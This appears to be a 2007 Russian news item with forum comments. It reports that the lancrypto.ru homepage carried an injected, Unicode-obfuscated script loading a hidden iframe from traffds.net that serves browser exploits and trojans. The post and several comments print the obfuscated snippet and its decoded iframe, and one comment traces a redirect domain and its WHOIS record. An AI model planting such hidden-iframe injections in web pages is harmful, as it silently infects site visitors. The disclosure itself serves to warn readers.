Сайт Lancrypto.ru распространяет опасный троян

image

В течении как минимум недели на сайте компании "ЛАН Крипто" расположен код, который пытается заразить компьютеры пользователей сайта вредоносной программой.

В течении как минимум недели на сайте компании "ЛАН Крипто" расположен код, который пытается заразить компьютеры пользователей сайта вредоносной программой.

Внутри главной страницы сайта www.lancrypto.ru расположен следующий код:

<!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\
u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\
u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0074\u0072\u0061\u0066\u0066\u0064\u0073\
u002e\u006e\u0065\u0074\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\
u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072
\u0061\u006d\u0065\u003e')</script><!-- c65 -->


Который пытается загрузить следующий вредоносных код:

<iframe src="http://www.traffds.net/tds/index.php" width=0 height=0></iframe> 


Эксплуатирующий несколько известных уязвимостей в браузерах Microsoft Internet Explorer и Mozilla Firefox. В результате заражения на компьютер пользователя устанавливается несколько троянских программ, которые устанавливают полный контроль над компьютером жертвы.



или введите имя

CAPTCHA
Страницы: 1  2  3  4  5  6  
1
26-07-2007 13:45:03
А сейчас этот код там присутствует? Зашел тишина.
0 |
1
26-07-2007 13:46:15
АГа есть до сих пор. РАз тишита, значит тебя уже поимели
0 |
1
26-07-2007 13:47:58
Сделай вью сорс и увидишь.
0 |
26-07-2007 14:04:39
Ну я сделал "вьюсорс" и увидел в конце это <!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0074\u0072\u0061\u0066\u0066\u0064\u0073\u002e\u006e\u0065\u0074\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><!-- c65 --> И что мне это сделает?! антивирус промолчал... опера тоже ничего не вякнула
0 |
1
26-07-2007 13:47:59
Ан нет есть, только Opera пофиг на него
0 |
26-07-2007 13:50:24
Ребят, вы JS знаете?! <!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\ u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\ u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0074\u0072\u0061\u0066\u0066\u0064\u0073\ u002e\u006e\u0065\u0074\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\ u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020 \u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e')</script><!-- c65 --> Это просто тупо напишет на всю страничку символы \u003c\u0069\u0066\u0072\ u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\ u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0074\u0072\u0061\u0066\u0066\u0064\u0073\ u002e\u006e\u0065\u0074\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\ u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020 \u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e Затерев при этом другой контент, как эти слешы, буковки и циферки: Который пытается загрузить следующий вредоносных код: <iframe src="http://www.traffds.net/tds/index.php" width=0 height=0></iframe> Мне лично как программисту не понятна... хм
0 |
1
26-07-2007 14:38:17
2zar0ku1 Ребят, вы JS знаете?! Знаем)) при загрузке страницы можно использовать document.write() - текст допишется, если использовать по окончании загрузки - тогда перепишет. Мне лично как программисту не понятна... хмЧто не понятно? там скрипт, который может выдать любое содержимое - влоть до сплоита
0 |
26-07-2007 15:55:23
мне не понятно как он запуститься... вот что =( у меня не запускается! =(
0 |
1
26-07-2007 18:10:45
га-га-га поржал спасибо
0 |
1
26-07-2007 14:55:56
а ты точно программист? \uXXXX определяет символ с unicode-кодом XXXX
0 |
26-07-2007 15:38:41
Дык как у тебя броузер по логике перекодирует его?! если у тебя четко наверху выставленно <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> ??? Это уже говорит о криворукости браузера... Вот Опера - правильный браузер!
0 |
26-07-2007 15:52:13
Даже если перекодирует попробуй написать скрипт и посмотреть что выдаст... у меня лично не перекодируется... При ручном перекодировании скрипт выдал синтаксическая ошибка (ну ет понятна) или просто выдает строчку как текст <iframe src="http://www.traffds.net/tds/index.php" width=0 height=0></iframe> Так что простите вирус запустить не смог =(
0 |
1
26-07-2007 14:02:23
Кстати с http://www.traffds.net/tds/index.php перекидывает на http://counter-google.com/stats/index.php и отдута тянет троянчика Какой гугл нехорошый.
0 |
26-07-2007 14:07:10
Сайт - липа... Registration Service Provided By: IMHOSTER.NET Contact: +380.688883706 Website: http://www.imhoster.net Domain Name: COUNTER-GOOGLE.COM Registrant: WK Hillton Roger Federic (wertname@gmail.com) 1271 Avenue of the Americas New York NY,10020 US Tel. +1.2125229565 Creation Date: 08-Jul-2007 Expiration Date: 08-Jul-2008 Domain servers in listed order: ns2.3gteam.info ns1.3gteam.info Поэтому давай, уважаемый, на гугл не будем
0 |
1
26-07-2007 14:53:23
MPack там старый висит
0 |
1
26-07-2007 15:25:14
Зашёл туда и вот: Trojan-Downloader.JS.Agent.kd
0 |
Страницы: 1  2  3  4  5  6